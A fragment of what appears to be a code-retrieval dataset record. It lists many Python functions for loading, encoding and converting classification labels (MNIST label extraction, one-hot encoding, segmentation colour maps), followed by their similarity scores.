if val[i] not in self.previousValues:\n labels.append(val[i])\n self.previousValues.append(val[i])\n return labels", "def create_label_array(el):\n num_digits = len(el) # first element of array holds the count\n labels_array = np.ones([MAX_LABELS+1], dtype=int) * 10\n labels_array[0] = num_digits\n for n in range(num_digits):\n if el[n] == 10: el[n] = 0 # reassign 0 as 10 for one-hot encoding\n labels_array[n+1] = el[n]\n return labels_array", "def create_label_array(el):\n num_digits = len(el) # first element of array holds the count\n labels_array = np.ones([MAX_LABELS+1], dtype=int) * 10\n labels_array[0] = num_digits\n for n in range(num_digits):\n if el[n] == 10: el[n] = 0 # reassign 0 as 10 for one-hot encoding\n labels_array[n+1] = el[n]\n return labels_array", "def extract_labels(filename, num_images):\n\n# this function definition has been taken from internet \n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(8)\n buf = bytestream.read(1 * num_images)\n labels = np.frombuffer(buf, dtype=np.uint8).astype(np.int64) #Interpret a buffer as a 1-dimensional array\n return labels", "def get_label_color_mapping(idx):\n # https://gist.github.com/wllhf/a4533e0adebe57e3ed06d4b50c8419ae\n def bitget(byteval, ch):\n return (byteval & (1 << ch)) != 0\n r = g = b = 0\n for j in range(8):\n r = r | (bitget(idx, 0) << 7 - j)\n g = g | (bitget(idx, 1) << 7 - j)\n b = b | (bitget(idx, 2) << 7 - j)\n idx = idx >> 3\n return np.array([r, g, b], dtype=np.uint8)", "def extract_labels(filename, num_images):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(8)\n buf = bytestream.read(1 * num_images)\n labels = np.frombuffer(buf, dtype=np.uint8).astype(np.int64)\n return labels", "def encode_labels(labels, nclass=5):\n y = np.zeros((len(labels), nclass)).astype('float32')\n for j, yj in enumerate(labels):\n for i in range(nclass):\n if i+1 == np.floor(yj) + 1:\n y[j, i] = yj - np.floor(yj)\n if i+1 == np.floor(yj):\n y[j, i] = np.floor(yj) - yj + 1\n return y", "def extract_labels(filename, num_images):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(8)\n buf = bytestream.read(1 * num_images)\n labels = np.frombuffer(buf, dtype=np.uint8).astype(np.int64)\n return labels", "def _get_labels(self, ind):\n pass", "def preprocess_labels(label, number_slices):\n labels = [[] for i in range(np.array(label).shape[0])]\n\n for j in range(np.array(label).shape[0]):\n if type(label) is not np.ndarray:\n for i in range(number_slices):\n labels[j].append(np.array(Image.open(label[0][i]), dtype=np.uint8))\n\n label = np.array(labels[0])\n label = label.transpose((1, 2, 0))\n max_mask = np.max(label) * 0.5\n label = np.greater(label, max_mask)\n label = np.expand_dims(label, axis=0)\n\n return label", "def extract_labels(filename, num_images):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(8)\n buf = bytestream.read(1 * num_images)\n labels = numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.int64)\n return labels", "def label_from_index(self, index):\n assert self.labels is not None, \"Labels not processed\"\n #return self.labels[index, :, :]\n return self.labels[index]", "def encode_labels(labels, nclass=5):\n Y = np.zeros((len(labels), nclass)).astype('float32')\n for j, y in enumerate(labels):\n for i in range(nclass):\n if i+1 == np.floor(y) + 1:\n Y[j,i] = y - np.floor(y)\n if i+1 == np.floor(y):\n Y[j,i] = np.floor(y) - y + 1\n return Y", "def extract_labels(filename, num_images):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(8)\n buf = bytestream.read(1 * num_images)\n labels = numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.int64)\n return labels", "def __get_ohe_label__(self, label_idx) -> List[int]:\n\n label = [0] * self.n_classes\n label[label_idx] = 1\n\n return label", "def fluxes_to_labels(fluxes: np.ndarray) -> np.ndarray:\n return ((1 - fluxes) // 2).astype(np.int8)", "def label2img2(label):\n buff = F.argmax(label, axis = 1)\n buff = F.vstack((buff, buff, buff))\n\n buff.data[0][buff.data[0] == 0] = 255\n buff.data[1][buff.data[1] == 0] = 0\n buff.data[2][buff.data[2] == 0] = 0\n\n buff.data[0][buff.data[0] == 1] = 0\n buff.data[1][buff.data[1] == 1] = 255\n buff.data[2][buff.data[2] == 1] = 0\n\n buff.data[0][buff.data[0] == 2] = 0\n buff.data[1][buff.data[1] == 2] = 0\n buff.data[2][buff.data[2] == 2] = 255\n\n return buff.data.astype(np.uint8)", "def binary_labels(output_labels, return_index=False, label_list=None):\n\n # Populate label list if required, otherwise input is used (e.g. for\n # evaluationd data to follow same format as training)\n if label_list == None:\n label_list = [\"OTHER#OTHER\"]\n\n for element in output_labels:\n for quality in element:\n if quality[0] not in label_list:\n label_list.append(quality[0])\n\n labels_binary = []\n\n empty_label = []\n\n for element in label_list:\n empty_label.append(0)\n\n\n # TODO: Array of single aspect variable arrays.\n for element in output_labels:\n labels_binary.append(empty_label[:])\n for quality in element:\n if quality[0] in label_list:\n labels_binary[-1][label_list.index(quality[0])] = 1\n else:\n labels_binary[-1][label_list.index(\"OTHER#OTHER\")] = 1\n # label_index[quality[0]] = label_index['max'] + 1\n # label_index['max'] += 1\n # labels_binary[-1][label_index[quality[0]]] = 1\n\n if return_index:\n # label list acts as a lookup incase of printing classification results\n return np.array(labels_binary), label_list\n else:\n return np.array(labels_binary)", "def label2img(label):\n color=[[255,0,0],[0,255,0],[0,0,255],[0,0,0],[0,255,255]]\n buff = F.argmax(label, axis = 1)\n out = np.zeros((3,buff.shape[1],buff.shape[2]))\n \n for k in range(5):\n for i in range(buff.shape[1]):\n for j in range(buff.shape[2]):\n if(buff.data[0][i][j] == k):\n out[0][i][j] = color[k][0]\n out[1][i][j] = color[k][1]\n out[2][i][j] = color[k][2]\n\n return out.astype(np.uint8)", "def load_label(self, idx):\n im = open('{}/GTTXT/{}.txt'.format(root_dir, idx))\n\t#print(type(im.readlines()[0].rstrip(\"\\n\")))\n rgb_label = [i.rstrip(\"\\n\").split(\" \") for i in im.readlines()]\n\tlabel=[]\t\n\tfor i in rgb_label:\n\t\tlabel+=[int(j) for j in i]\n\tlabel=np.array(label).reshape(720,960)\n\tlabel[label==-1]=12\n\t#print(np.unique(label))\n #label = label[np.newaxis, ...]\n return label", "def extract_labels(filename, num_images):\n filepath = os.path.join(WORK_DIRECTORY, filename)\n print('Extracting', filepath)\n with open(filepath, mode='rb') as bytestream:\n buf = bytestream.read(1 * num_images)\n labels = numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.int64)\n return labels", "def get_labels(self):\n return self.labels[1:]", "def decode_labels(mask, num_classes=41):\n h, w = mask.shape\n outputs = np.zeros((h, w, 3), dtype=np.uint8)\n\n img = Image.new('RGB',(len(mask[0]), len(mask)))\n pixels = img.load()\n for j_, j in enumerate(mask):\n for k_, k in enumerate(j):\n if k < num_classes:\n pixels[k_, j_] = label_colours[k]\n outputs = np.array(img)\n return outputs", "def rgb_to_2D_label(label):\n label_seg = np.zeros(label.shape,dtype=np.uint8)\n label_seg [np.all(label == Building,axis=-1)] = 0\n label_seg [np.all(label==Land,axis=-1)] = 1\n label_seg [np.all(label==Road,axis=-1)] = 2\n label_seg [np.all(label==Vegetation,axis=-1)] = 3\n label_seg [np.all(label==Water,axis=-1)] = 4\n label_seg [np.all(label==Unlabeled,axis=-1)] = 5\n \n label_seg = label_seg[:,:,0] #Just take the first channel, no need for all 3 channels\n \n return label_seg", "def return_histogram_labels():\n return list(labels)", "def _labels(path):\r\n with gzip.open(path) as f:\r\n # First 8 bytes are magic_number, n_labels\r\n integer_labels = np.frombuffer(f.read(), 'B', offset=8)\r\n\r\n def _onehot(integer_labels):\r\n \"\"\"Return matrix whose rows are onehot encodings of integers.\"\"\"\r\n n_rows = len(integer_labels)\r\n n_cols = integer_labels.max() + 1\r\n onehot = np.zeros((n_rows, n_cols), dtype='uint8')\r\n onehot[np.arange(n_rows), integer_labels] = 1\r\n return onehot\r\n\r\n return _onehot(integer_labels)", "def retrieve_labels(file, label_indices):\n\n\t# Initialize numpy matrix to store the images\n\tlabels = np.zeros((len(label_indices), 10))\n\n\twith open(file, \"rb\") as f:\n\t\t# Intialize counters\n\t\ti = 0\n\t\tlabel_number = 0\n\n\t\t# Read first byte\n\t\tbyte = f.read(1)\n\n\t\t# Find each image in the data file\n\t\tfor label_index in label_indices:\n\t\t\t# Read in bytes until you arrive at the label\n\t\t\twhile byte and (i < (label_index + 8)):\n\t\t\t\tbyte = f.read(1)\n\t\t\t\ti += 1\n\n\t\t\t# Store label value in numpy array\n\t\t\tvalue = int.from_bytes(byte, \"big\")\n\t\t\tlabels[label_number] = np.zeros(10)\n\t\t\tlabels[label_number, value] = 1\n\n\t\t\t# Increment to next label\n\t\t\tlabel_number += 1\n\n\treturn labels", "def to_categorical(index_label, num_classes):\n return index_label, np.eye(num_classes, dtype='uint8')[index_label]", "def convertLabels(self, labels):\n counter = 0\n numericLabels = []\n for label in labels:\n if label not in self.labelDict:\n self.labelDict[label] = counter\n self.backwards_conversion[counter] = label\n counter += 1\n numericLabels += [self.labelDict[label]]\n return np.array(numericLabels)", "def read_labels(labels_path):\n data = []\n with open(labels_path, 'r') as f:\n for line in f:\n line = line.split()\n sample = (line[0], int(line[1]))\n data.append(sample)\n \n dtype = [('video', '<U50'), ('label', int)]\n X = np.array(data, dtype=dtype)\n X = np.sort(X, order='video')\n return X", "def encode_label(label: np.array, nb_classes: int):\n encoded = np.zeros(nb_classes)\n encoded[int(label)] = 1.\n return encoded", "def compute_labels(pos, neg):\n labels = np.zeros(len(pos) + len(neg), dtype=np.int8)\n labels[:len(pos)] = 1\n labels[len(pos):] = 0\n return labels", "def one_hot_encoding((uri, label), all_labels):\n labels = [0]*NUM_LABELS\n for i, l in enumerate(all_labels):\n if label == l:\n labels[i] = 1\n yield uri, labels", "def indices_of_label(self, label_name):\n return self.indices_of('label', label_name)", "def get_one_hot_encoded(self, label):\n try:\n label = str(label, 'utf-8').lower()\n except:\n label = str(label).lower() # hack for pytest TODO\n vector = np.zeros(self._labels_dim, dtype=int)\n index = self.get_label_2_index(label=label)\n vector[index] = 1\n return vector", "def get_uci_labels():\n labels_array = []\n letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h']\n numbers = ['1', '2', '3', '4', '5', '6', '7', '8']\n promoted_to = ['q', 'r', 'b', 'n']\n\n for l1 in range(8):\n for n1 in range(8):\n destinations = [(t, n1) for t in range(8)] + \\\n [(l1, t) for t in range(8)] + \\\n [(l1 + t, n1 + t) for t in range(-7, 8)] + \\\n [(l1 + t, n1 - t) for t in range(-7, 8)] + \\\n [(l1 + a, n1 + b) for (a, b) in\n [(-2, -1), (-1, -2), (-2, 1), (1, -2),\n (2, -1), (-1, 2), (2, 1), (1, 2)]]\n\n for (l2, n2) in destinations:\n if (l1, n1) != (l2, n2) and l2 in range(8) and n2 in range(8): # noqa: E501\n move = letters[l1] + numbers[n1] + letters[l2] + numbers[n2] # noqa: E501\n labels_array.append(move)\n\n for l1 in range(8):\n letter = letters[l1]\n for p in promoted_to:\n labels_array.append(letter + '2' + letter + '1' + p)\n labels_array.append(letter + '7' + letter + '8' + p)\n if l1 > 0:\n l_l = letters[l1 - 1]\n labels_array.append(letter + '2' + l_l + '1' + p)\n labels_array.append(letter + '7' + l_l + '8' + p)\n if l1 < 7:\n l_r = letters[l1 + 1]\n labels_array.append(letter + '2' + l_r + '1' + p)\n labels_array.append(letter + '7' + l_r + '8' + p)\n return labels_array", "def to_inds_list(frame_labels: np.ndarray, unlabeled_label: int = 0) -> list[np.ndarray]:\n segment_inds = np.nonzero(frame_labels != unlabeled_label)[0]\n return np.split(segment_inds, np.where(np.diff(segment_inds) != 1)[0] + 1)", "def get_labels(self) -> np.array:\n nb_samples = len(self.list_IDs)\n M = np.empty((nb_samples, *self.dim[:-1], 3))\n\n for i, ID in enumerate(self.list_IDs):\n M[i,] = np.load(self.mask_data_path + ID, allow_pickle=True)\n\n return M", "def get_labels(self) -> np.ndarray:\n return self._dataset.get_labels()[self._ids]", "def labels(self) -> ndarray:\n return self._labels", "def encode(self, labels):\n # use 2 channel since BGR2RGB convertion\n labels = labels.astype(float)[..., 2] / 255 \n return labels[..., np.newaxis]", "def labels2Vec(labels):\r\n global dict_words_n_vectors\r\n\r\n for i in range(len(labels)):\r\n if labels[i] in dict_words_n_vectors:\r\n labels[i] = dict_words_n_vectors[labels[i]]\r\n else:\r\n labels[i] = np.zeros(300)\r\n return np.array(labels, dtype=\"float32\")", "def voc_label_indices(colormap, colormap2label):\n colormap = np.array(colormap.convert(\"RGB\")).astype('int32')\n idx = ((colormap[:, :, 0] * 256 + colormap[:, :, 1]) * 256\n + colormap[:, :, 2])\n return colormap2label[idx]", "def _extract_labels(self, samples: List):\n targets = [\n self.sp_model.encode(sample[2].lower().replace(\"<unk>\", \"<garbage>\").replace(\"\\n\", \"\"))\n for sample in samples\n ]\n targets = [\n [ele if ele != 4 else self.sp_model.unk_id() for ele in target] for target in targets\n ] # map id of <unk> token to unk_id\n lengths = torch.tensor([len(elem) for elem in targets]).to(dtype=torch.int32)\n targets = torch.nn.utils.rnn.pad_sequence(\n [torch.tensor(elem) for elem in targets],\n batch_first=True,\n padding_value=1.0,\n ).to(dtype=torch.int32)\n return targets, lengths", "def _extract_labels(self, filename, one_hot=False):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n magic = self._read32(bytestream)\n if magic != 2049:\n raise ValueError(\n 'Invalid magic number %d in MNIST label file: %s' %\n (magic, filename))\n num_items = self._read32(bytestream)\n buf = bytestream.read(num_items)\n labels = np.frombuffer(buf, dtype=np.uint8)\n if one_hot:\n return self._dense_to_one_hot(labels)\n return labels", "def get_label(self):\n oshape = (ctypes.c_uint * 2)()\n ostride = ctypes.c_uint()\n ret = cxnlib.CXNIOGetLabel(self.handle,\n oshape, ctypes.byref(ostride))\n return ctypes2numpyT(ret, [x for x in oshape], 'float32', ostride.value)", "def encode_labels(self, lilabs):\n\n y = []\n for lab in lilabs:\n y.append([1 if l in lab else 0 for l in self.labels])\n\n return np.array(y, dtype=float)", "def fromIndex(index):\n return Data.labels[index]", "def get_label_ix_mapping(labels):\n return {label: i for i, label in enumerate(labels)}", "def provide_label(self):\r\n return [(k, tuple([1] + list(v.shape[1:]))) for k, v in self.label]", "def encode_ST_labels(labels):\n return np.array([1 if sentiment == 'bullish' else 0 for sentiment in labels])", "def extract_labels(filename):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n magic = _read32(bytestream)\n if magic != 2049:\n raise ValueError(\n 'Invalid magic number %d in MNIST label file: %s' %\n (magic, filename))\n num_items = _read32(bytestream)\n buf = bytestream.read(num_items)\n labels = np.frombuffer(buf, dtype=np.uint8)\n return dense_to_one_hot(labels)", "def label_to_one_hot(label, num_of_class=2):\r\n import numpy as np\r\n one_hot = np.zeros((len(label), num_of_class), dtype=np.uint8)\r\n for i in range(len(label)):\r\n one_hot[i, int(label[i] - 1)] = 1 # label is 1 and 2\r\n\r\n return one_hot", "def load_labels(labels_dir, trial_name):\n labels_path = labels_dir + trial_name + \".txt\"\n raw_labels_data = np.genfromtxt(labels_path, dtype=np.int,\n converters=LABELS_CONVERTERS,\n usecols=LABELS_USECOLS)\n #print(\"rawlabelsdata: \", raw_labels_data)\n #print(get_first_frame(labels_path))\n frames = np.arange(get_first_frame(labels_path), get_last_frame(labels_path)+1, dtype=np.int)\n #print(\"frames: \", frames)\n #print(frames.shape)\n #labels = np.zeros(frames.shape, dtype=np.int)\n labels1 = []\n #print(labels)\n for start, end, label in raw_labels_data:\n #mask = (frames >= start) & (frames <= end)\n #print(start)\n #print(end)\n i = start\n while(i<end):\n if(i%6 == 0):\n labels1.append(label)\n i = i+1\n\n #labels[mask] = label\n #print(\"labels[mask]: \",labels[mask])\n labels1 = np.array(labels1)\n #print(labels1)\n labels_data = labels1.reshape(-1,1)\n #print(labels1.shape)\n #print(\"labels: \", labels_data)\n \n return labels_data", "def _convert_to_onehot_labels(seg_label, num_classes):\n\n batch_size = seg_label.size(0)\n onehot_labels = seg_label.new_zeros((batch_size, num_classes))\n for i in range(batch_size):\n hist = seg_label[i].float().histc(\n bins=num_classes, min=0, max=num_classes - 1)\n onehot_labels[i] = hist > 0\n return onehot_labels", "def generate_labels(n_samples):\n return np.ones([n_samples, 1]), np.zeros([n_samples, 1])", "def labels_to_labels(class_labels, num_classes =4):\n levels = []\n for label in class_labels:\n levels_from_label = label_to_levels(int(label), num_classes=num_classes)\n levels.append(levels_from_label)\n return torch.stack(levels).cuda()", "def read_labels(labels_path):\n with open(labels_path, 'r') as file:\n data = file.read()\n data = data.split()\n data = np.array(data)\n data = np.reshape(data, (-1, 2))\n return data", "def labels_(self) -> DNDarray:\n return self._labels", "def infer_data_labels(X_labels, cluster_labels):\r\n #Empty array of len(X)\r\n predicted_labels = np.zeros(len(X_labels)).astype(np.uint8)\r\n \r\n for i, cluster in enumerate(X_labels):\r\n for key, value in cluster_labels.items():\r\n if cluster in value:\r\n predicted_labels[i] = key\r\n \r\n return predicted_labels", "def convert_to_compact_array(data, label):\n indices = np.arange(230 * 230).reshape(230, 230)\n t1, t2, pd, dn = label\n m = np.ma.masked_equal(pd, 0)\n t1_masked, t2_masked, pd_masked, indices_masked, dn_masked = \\\n np.ma.masked_array(t1, m.mask), np.ma.masked_array(t2, m.mask), \\\n np.ma.masked_array(pd, m.mask), np.ma.masked_array(indices, m.mask), \\\n np.ma.masked_array(dn, m.mask)\n t1_compressed, t2_compressed, pd_compressed, indices_compressed, dn_compressed = \\\n np.ma.compressed(t1_masked), np.ma.compressed(t2_masked), \\\n np.ma.compressed(pd_masked), np.ma.compressed(indices_masked), \\\n np.ma.compressed(dn_masked)\n\n fp_compressed = []\n for index in indices_compressed:\n x = int(index // 230)\n y = int(index % 230)\n fp_compressed.append(data[x][y])\n fp_compressed = np.asarray(fp_compressed)\n # recon = np.zeros((230, 230))\n # x = indices_compressed // 230\n # y = indices_compressed % 230\n # recon[x, y] = t1_compressed[np.arange(len(indices_compressed))]\n\n label = np.asarray([t1_compressed, t2_compressed, pd_compressed, indices_compressed, dn_compressed])\n label = np.transpose(label)\n data = fp_compressed\n return data, label", "def indices_to_one_hot(data, nb_classes):\n\ttargets = np.array(data).reshape(-1)\n\treturn np.eye(nb_classes)[targets]", "def extract_npy(self, mode='train', devices='abc'):\n\n data = []\n label = []\n with h5py.File(self.dev_h5_path, 'r') as f:\n audios = f[mode].keys()\n for audio in audios:\n # extract according to device\n if f[mode][audio].attrs['device'] in devices:\n data.append(np.array(f[mode][audio].value))\n label.append(np.array(f[mode][audio].attrs['label']))\n # concat data along existing axis 0\n data = np.concatenate(data, axis=0)\n le = preprocessing.LabelBinarizer()\n label_onehot = le.fit_transform(np.array(label))\n return data, label_onehot", "def transform_labels(self, labels):\n # Fallback:\n # return self.encoder.transform(labels)\n classes = list(self.classes_())\n return [classes.index(label) for label in labels]", "def transform_labels(self, labels):\n # Fallback:\n # return self.encoder.transform(labels)\n classes = list(self.classes_())\n return [classes.index(label) for label in labels]", "def create_TargetLabel(dataset):\n label_Array = dataset['close_-1_r'].shift(-1)\n label_Array = label_Array.apply(lambda x:1 if x>0.0000 else 0)\n return label_Array", "def _binary_2d_label_to_sparse_value(labels):\n indices = []\n values = []\n batch = 0\n for row in labels:\n label = 0\n xi = 0\n for x in row:\n if x == 1:\n indices.append([batch, xi])\n values.append(label)\n xi += 1\n else:\n assert x == 0\n label += 1\n batch += 1\n shape = [len(labels), len(labels[0])]\n return sparse_tensor.SparseTensorValue(\n np.array(indices, np.int64), np.array(values, np.int64),\n np.array(shape, np.int64))", "def get_labels(self):\n\n for i in range(self.p.shape[0]):\n self.find(i)\n return self.p", "def read_labels(idx_filename):\n return IdxFileLoader().load(idx_filename, gzip_compressed=True)[-1]", "def colors_for_labels():\n colors = [(i * np.array([2 ** 25 - 1, 2 ** 15 - 1, 2 ** 21 - 1]) % 255).astype(np.uint8) for i in range(len(CATEGORY))]\n #colors = np.array(range(len(COCO_INSTANCE_CATEGORY_NAMES))) * np.array([2 ** 25 - 1, 2 ** 15 - 1, 2 ** 21 - 1])\n #colors = (colors % 255).numpy().astype(\"uint8\")\n return colors", "def encode_labelmap(colour_img, colourlabelmap):\n colour_img = colour_img.astype(int)\n labels = np.zeros((colour_img.shape[0], colour_img.shape[1]), dtype=np.int16)\n for label_id, colour in enumerate(colourlabelmap):\n labels[np.where(np.all(colour == colour_img, axis=-1))] = label_id\n\n return labels", "def label2onehot(self, batch_size, labels):\r\n dim = 6\r\n out = torch.zeros(batch_size, dim)\r\n out[np.arange(batch_size), labels] = 1\r\n return out", "def groupByLabel( y ):\n index = []\n for i in np.unique(y): # pour toutes les classes\n ind, = np.where(y==i)\n index.append(ind)\n \n return index", "def get_label(self, indices=None):\n if indices is None:\n indices = list(range(0, self.get_sample_size()))\n elif isinstance(indices, collections.abc.Iterable):\n indices = sorted(list(set(indices)))\n else:\n indices = [indices]\n\n if len(indices) == 0:\n return []\n partitions = self.get_partitions(self.persistence)\n labels = self.X.shape[0] * [None]\n for label, partition_indices in partitions.items():\n for idx in np.intersect1d(partition_indices, indices):\n labels[idx] = label\n\n labels = np.array(labels)\n if len(indices) == 1:\n return labels[indices][0]\n return labels[indices]", "def load_labels(filename):\n\n file_path = os.path.join(DATA_DIR, filename)\n with open(file_path, 'rb') as f:\n b = f.read()\n\n magic, n_labels = (struct.unpack('>i', b[i*4:(i+1)*4]) for i in range(2))\n\n assert magic[0] == 2049, \"bad magic number, what do?\"\n\n label_stream = array.array('B', b[8:])\n \n assert len(label_stream) == n_labels[0], \"mismatch in label length\"\n \n # label_stream is actually type array.array, which is iterable surely.\n # i'll convert it anyway...\n return tuple(label_stream)", "def indices_to_one_hot(data, nb_classes):\n targets = np.array(data).reshape(-1)\n return np.eye(nb_classes)[targets]", "def indices_to_one_hot(data, nb_classes):\n targets = np.array(data).reshape(-1)\n return np.eye(nb_classes)[targets]", "def indices_to_one_hot(data, nb_classes):\n targets = np.array(data).reshape(-1)\n return np.eye(nb_classes)[targets]", "def indices_to_one_hot(data, nb_classes):\n targets = np.array(data).reshape(-1)\n return np.eye(nb_classes)[targets]", "def get_label(path): # get ED ES label\n label_csv = pd.read_csv(path)\n label_list = []\n trans_list = list(np.array(label_csv).astype(np.int32))\n for i in trans_list:\n temp = []\n for j in i:\n if j >= 0:\n temp.append(j)\n label_list.append(temp)\n return label_list", "def __getitem__(self, idx):\n record = self.records[idx]\n return np.array(record['feat']), np.array(record['label'], dtype=np.int64)", "def encode_labels(self, y, num_labels):\n onehot = np.zeros((num_labels, y.shape[0]))\n for i in range(y.shape[0]):\n onehot[y[i], i] = 1.0\n return onehot", "def load_labels(label_path):\r\n\r\n with open(label_path, \"r\") as f:\r\n\r\n lines = f.readlines()\r\n \r\n label = {}\r\n index = []\r\n for i, line in enumerate(lines):\r\n sp = line.split()\r\n label[sp[0]] = [int(sp[1]),int(sp[2]),int(sp[3])]\r\n index.append([int(sp[3]),int(sp[2]),int(sp[1])])\r\n\r\n return label, index", "def make_raw_data(self):\n\t\tfilter = self.predictions.max(1) > self.confidence\n\t\tdata = self.test_data[filter, :]\n\t\tlabels = self.predictions[filter, :].argmax(1).astype(uint16) + 1\n\t\treturn data, labels", "def label_from_index(self, index):\n assert self.labels is not None, \"Labels not processed\"\n return self.labels[index]", "def digit_indices_to_labels(digits_run1, digits_run2):\n labels_run1, labels_run2 = np.zeros(shape=256), np.zeros(shape=256)\n for finger_i in range(1, 6):\n labels_run1[digits_run1[finger_i - 1]] = finger_i\n labels_run2[digits_run2[finger_i - 1]] = finger_i\n return labels_run1, labels_run2", "def _extract_class(labels: List[int], class_index: int):\n class_ids = [i for i, label in enumerate(labels) if label == class_index]\n return class_ids", "def labels(self):\n return self._labels", "def mask_to_label(mask):\n # get the image size\n h, w, _ = mask.shape\n\n # build a color to label map\n color_to_idx = {}\n for label in class_info:\n color_to_idx[class_info[label].color] = class_info[label].id\n\n # generate label matrix\n label = np.zeros((h, w), dtype=np.uint8)\n for y in range(h):\n for x in range(w):\n b, g, r = mask[y, x]\n color = (r, g, b)\n label[y, x] = color_to_idx[color]\n\n return label", "def getLabels(self):\n return self.numToLabel", "def get_label(self, label):\n\n return torch.from_numpy(np.array(label)).long()", "def pixel_label_vector(self, pixel_index):\n return self.label_vector", "def get_label_with_index(labels, index):\n return labels[np.where(labels[:, 0] == index)]", "def label_encode(data: List) -> [np.ndarray, List[LabelEncoder]]:\n labels_encoded = []\n data_encoded = np.array(data)\n for i in range(data_encoded.shape[1]):\n le = preprocessing.LabelEncoder()\n le.fit(data_encoded[:, i])\n labels_encoded.append(le)\n data_encoded[:, i] = le.transform(data_encoded[:, i])\n\n data_encoded = data_encoded.astype(int)\n return data_encoded, labels_encoded", "def _decode_to_index(self, decoder_output):\n value, index = torch.topk(decoder_output, 1)\n index = index.transpose(0, 1) # S = 1 x B, 1 is the index of top1 class\n if self.use_cuda:\n index = index.cuda()\n return index", "def get_label_map(labels):\n label_map = dict()\n for i,v in enumerate(np.ravel(labels.data)):\n if v in label_map.keys():\n label_map.get(v).append(i)\n else:\n label_map[v] = [i]\n return label_map" ]
[ "0.70427394", "0.70352", "0.68724084", "0.6775525", "0.67488664", "0.67066264", "0.67066264", "0.66832286", "0.6675897", "0.65783316", "0.657126", "0.65644187", "0.65461975", "0.6527157", "0.65213823", "0.651859", "0.6512153", "0.65094626", "0.6494245", "0.6442707", "0.6426446", "0.64246345", "0.6420002", "0.6410096", "0.63704365", "0.6333506", "0.6323577", "0.62982804", "0.62881804", "0.62867075", "0.6257277", "0.62549657", "0.6251194", "0.6249509", "0.62385356", "0.6201743", "0.6201299", "0.6196375", "0.6193234", "0.61884993", "0.6181296", "0.61669886", "0.6163924", "0.61600244", "0.6144549", "0.611099", "0.60820746", "0.60718745", "0.60713166", "0.6066705", "0.60537386", "0.6051239", "0.60458755", "0.60439384", "0.6042537", "0.6039367", "0.6033123", "0.60295564", "0.60281044", "0.602535", "0.60216796", "0.6020794", "0.60071653", "0.60061705", "0.5998028", "0.5997444", "0.59837353", "0.59799767", "0.59799767", "0.5978724", "0.5966851", "0.59408486", "0.593383", "0.5931964", "0.5928703", "0.5926831", "0.5925557", "0.5914727", "0.5911915", "0.58881855", "0.58881855", "0.58881855", "0.58881855", "0.5887598", "0.5887309", "0.5886391", "0.5885734", "0.5873554", "0.58669937", "0.5865464", "0.5861478", "0.585411", "0.5853906", "0.58497983", "0.5843739", "0.5843588", "0.5838408", "0.58382535", "0.58275723", "0.5826133" ]
0.64324766
20
Copies the folder from the source directory into a docs folder eliminating commercial information.
def oh_folders(src, dest=dest): copytree(src, dest, ignore=ignore_patterns(*ignore_list), dirs_exist_ok=True)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def copy_docs():\n local('rsync -av --delete --exclude=.svn %s:%s/ /tmp/djangodocs/' %\n (env.hosts[0], env.deploy_base.child('docbuilds')))", "def copy_project_docs(srctree):\n docdir = os.path.join(srctree, 'Doc')\n\n # This block shouldn't be here, but I do not yet know how to\n # embed this in ReST files.\n extra_info = {}\n if os.path.exists(os.path.join(docdir, 'website.lst')):\n fd = open(os.path.join(docdir, 'website.lst'))\n for ln in fd.readlines():\n if ln.startswith('#'): continue\n fields = ln.split(',')\n extra_info[fields[0].strip()] = {\n 'section': fields[1].strip(),\n 'priority': int(fields[2].strip()),\n }\n\n docs = [ os.path.join(docdir, fn)\n for fn in os.listdir(docdir) if fn.endswith('.txt') ]\n docs.append(os.path.join(srctree, 'Install.txt'))\n docs.append(os.path.join(srctree, 'NEWS.txt'))\n docs.append(os.path.join(docdir, 'tutorial', 'tutorial.txt'))\n docs.append(os.path.join(docdir, 'tutorial_embed', 'extending_objc_with_python.txt'))\n NAMES = {\n os.path.join(srctree, 'Examples', '00ReadMe.txt') : 'Examples.txt',\n }\n docs.extend(NAMES)\n\n alldocs = {}\n\n for fname in docs:\n print \"-\", fname\n docinfo = {}\n\n bn = NAMES.get(fname)\n if bn is None:\n bn = os.path.split(fname)[-1]\n if bn in ('index.txt', 'announcement.txt'):\n continue\n if extra_info.has_key(bn):\n docinfo.update(extra_info[bn])\n\n if bn.endswith('.txt'):\n bn = bn[:-3].lower() + \"php\"\n else:\n bn = bn.lower() + '.php'\n fd = open(fname)\n input = fd.read()\n fd.close()\n output = docutils.core.publish_string(\n source = input,\n source_path = fname,\n destination_path = bn,\n writer_name = 'hthtml')\n \n output_lines = output.split('\\n')\n for i in range(len(output_lines)):\n if output_lines[i] == '':\n break\n idx = output_lines[i].find(':')\n if idx == -1:\n break\n\n key = output_lines[i][:idx].strip()\n value = output_lines[i][idx+1:].strip()\n docinfo[key] = value\n\n output = '\\n'.join(output_lines[i:])\n if not docinfo.has_key('title'):\n docinfo['title'] = bn\n alldocs[bn] = docinfo\n \n fd = open(os.path.join('docroot', 'doc', bn), 'w')\n fd.write(PHP_HEADER%docinfo)\n\n fd.write(output);\n\n fd.write(PHP_FOOTER)\n\n # Calculate indices for user and developer documentation\n docs = alldocs.keys()\n developer_docs = []\n user_docs = []\n\n for doc in alldocs:\n if not alldocs[doc].has_key('section'):\n print \"Skipping\", doc\n continue\n\n if alldocs[doc]['section'] == 'user':\n user_docs.append([alldocs[doc]['title'], doc])\n elif alldocs[doc]['section'] == 'developer':\n developer_docs.append([alldocs[doc]['title'], doc])\n\n def doccmp(a, b):\n r = cmp(alldocs[a[1]]['priority'], alldocs[b[1]]['priority'])\n if r != 0: return r\n\n return cmp(a[1], b[1])\n user_docs.sort(doccmp)\n developer_docs.sort(doccmp)\n \n # Rewrite the indices (substitute the current document lists)\n for fname in ('index.php', 'usage.php', 'developer.php'):\n fd = open(os.path.join('docroot', 'doc', fname), 'r')\n index_php = 